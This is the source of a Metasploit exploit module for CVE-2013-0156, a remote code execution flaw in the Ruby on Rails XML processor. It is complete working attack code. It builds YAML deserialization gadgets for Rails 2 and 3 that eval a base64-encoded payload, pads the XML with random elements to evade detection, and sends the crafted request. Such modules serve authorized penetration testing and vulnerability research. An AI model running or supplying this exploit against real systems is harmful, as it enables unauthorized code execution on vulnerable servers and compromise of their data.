metasploit-gs/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Ruby on Rails XML Processor YAML Deserialization Code Execution',
        'Description' => %q{
          This module exploits a remote code execution vulnerability in the XML request
          processor of the Ruby on Rails application framework. This vulnerability allows
          an attacker to instantiate a remote object, which in turn can be used to execute
          any ruby code remotely in the context of the application.

          This module has been tested across multiple versions of RoR 3.x and RoR 2.x

          The technique used by this module requires the target to be running a fairly recent
          version of Ruby 1.9 (since 2011 or so). Applications using Ruby 1.8 may still be
          exploitable using the init_with() method, but this has not been demonstrated.
        },
        'Author' => [
          'charliesome', # PoC
          'espes',        # PoC and Metasploit module
          'lian',         # Identified the RouteSet::NamedRouteCollection vector
          'hdm'           # Module merge/conversion/payload work
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2013-0156' ],
          [ 'OSVDB', '89026' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156' ]
        ],
        'Platform' => 'ruby',
        'Arch' => ARCH_RUBY,
        'Privileged' => false,
        'Targets' =>	[ ['Automatic', {} ] ],
        'DisclosureDate' => '2013-01-07',
        'DefaultOptions' => { "PrependFork" => true },
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('URIPATH', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
        OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT'] ])
      ]
    )

    register_evasion_options(
      [
        OptBool.new('XML::PadElement', [ true, 'Pad the exploit request with randomly generated XML elements', true])
      ]
    )
  end

  #
  # Create the YAML document that will be embedded into the XML
  #
  def build_yaml_rails2
    code = Rex::Text.encode_base64(payload.encoded)
    yaml =
      "--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
      "'#{Rex::Text.rand_text_alpha(rand(8) + 1)}; " +
      "eval(%[#{code}].unpack(%[m0])[0]);' " +
      ": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n   " +
      ":#{Rex::Text.rand_text_alpha(rand(8) + 1)}:\n     :#{Rex::Text.rand_text_alpha(rand(8) + 1)}: " +
      ":#{Rex::Text.rand_text_alpha(rand(8) + 1)}\n"
    yaml
  end

  #
  # Create the YAML document that will be embedded into the XML
  #
  def build_yaml_rails3
    code = Rex::Text.encode_base64(payload.encoded)
    yaml =
      "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
      "'#{Rex::Text.rand_text_alpha(rand(8) + 1)}; " +
      "eval(%[#{code}].unpack(%[m0])[0]);' " +
      ": !ruby/object:OpenStruct\n table:\n  :defaults: {}\n"
    yaml
  end

  #
  # Create the XML wrapper with any desired evasion
  #
  def build_request(v)
    xml = ''

    elo = Rex::Text.rand_text_alpha(rand(12) + 4)

    if datastore['XML::PadElement']
      xml << "<#{elo}>"

      1.upto(rand(1000) + 50) do
        el = Rex::Text.rand_text_alpha(rand(12) + 4)
        tp = ['string', 'integer'][rand(2)]
        xml << "<#{el} type='#{tp}'>"
        xml << (tp == "integer" ? Rex::Text.rand_text_numeric(rand(8) + 1) : Rex::Text.rand_text_alphanumeric(rand(8) + 1))
        xml << "</#{el}>"
      end
    end

    el = Rex::Text.rand_text_alpha(rand(12) + 4)
    xml << "<#{el} type='yaml'>"
    xml << (v == 2 ? build_yaml_rails2 : build_yaml_rails3)
    xml << "</#{el}>"

    if datastore['XML::PadElement']
      1.upto(rand(1000) + 50) do
        el = Rex::Text.rand_text_alpha(rand(12) + 4)
        tp = ['string', 'integer'][rand(2)]
        xml << "<#{el} type='#{tp}'>"
        xml << (tp == "integer" ? Rex::Text.rand_text_numeric(rand(8) + 1) : Rex::Text.rand_text_alphanumeric(rand(8) + 1))
        xml << "</#{el}>"
      end

      xml << "</#{elo}>"
    end

    xml
  end

  #
  # Send the actual request
  #
  def exploit
    [2, 3].each do |ver|
      print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...")
      send_request_cgi({
        'uri' => datastore['URIPATH'] || "/",
        'method' => datastore['HTTP_METHOD'],
        'ctype' => 'application/xml',
        'headers' => { 'X-HTTP-Method-Override' => 'get' },
        'data' => build_request(ver)
      }, 25)
      handler
    end
  end
end